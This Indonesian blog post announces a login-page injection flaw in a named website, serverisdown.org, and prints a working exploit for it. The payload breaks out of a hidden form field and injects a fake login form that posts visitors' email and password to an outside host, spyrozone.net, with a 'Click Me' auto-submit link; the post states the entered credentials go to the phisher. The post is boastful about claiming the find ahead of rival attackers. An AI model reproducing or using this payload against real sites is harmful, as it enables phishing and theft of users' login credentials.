erverisdown.org merupakan situs yang belakangan ini jadi perhatian karena aksi-aksi serangannya ke Malaysia. Kedua belah pihak sama-sama saling menghancurkan. Akhirnya yang jadi korban dan menderita ya si pemilik situs yang diserang, hehehe..
Ada kelemahan menarik di website serverisdown.org. Saya posting duluan sebelum penyerang dari negara tetangga berbangga hati dan mengklaim kelemahan ini sebagai temuannya ^^
Vulnerable Area
Kelemahan ada pada penanganan error halaman login yang tidak disanitasi dengan baik.
Halaman Login Serverisdown.org
Exploit
//Fake Login
2 | <input type=hidden name=email style="width:150px;" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"></form></td></tr><tr><form action="http://spyrozone.net" method=post name=whatevah><td>Your email (Confirm)</td><td><input type=text name=email width=150px></td></tr><tr><td>Your password</td><td><input type=password name=password width=150px></td></tr></table><input type=submit value=Ok></form><br><br>Fake Login Example | XSSED by SPYRO KiD | http://spyrozone.net<style><noscript>"> |
3 | <input type=hidden name=remember value=1> |
4 | <a href="#" onClick="editor.submit();">Click Me</a> |
Screenshot:
Fake Login serverisdown.org
Jika seseorang memasukkan informasi login melalui form yang telah diinjeksi tersebut, maka informasi yang dimasukkan akan terkirim ke Phiser.
Tidak ada komentar:
Posting Komentar